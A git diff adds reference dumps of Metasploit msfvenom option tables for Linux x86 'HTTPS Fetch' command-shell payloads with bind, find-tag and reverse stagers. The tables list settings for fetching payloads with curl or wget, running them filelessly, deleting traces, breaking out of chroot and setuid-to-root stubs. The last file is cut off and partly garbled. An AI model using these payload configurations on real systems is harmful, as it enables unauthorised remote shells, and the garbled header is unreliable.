a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..0936283 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp.txt @@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VpfdGDrWDMN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..609a75f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,100 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eyiRmgIg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..9f47cdc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_nonx_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zHYaPgGJH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..d226d4a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp.txt @@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UevlRPHWsW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..fa1cc6d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-bind_tcp_uuid.txt @@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/https/x86/shell/bind_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ayeQmgmImG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt new file mode 100644 index 0000000..4fea695 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-find_tag.txt @@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/https/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RCzcOyxjQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG OXG0 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..9d8e5f0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_ipv6_tcp.txt @@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp: +========================= + + + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kXWmBKViLXp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the 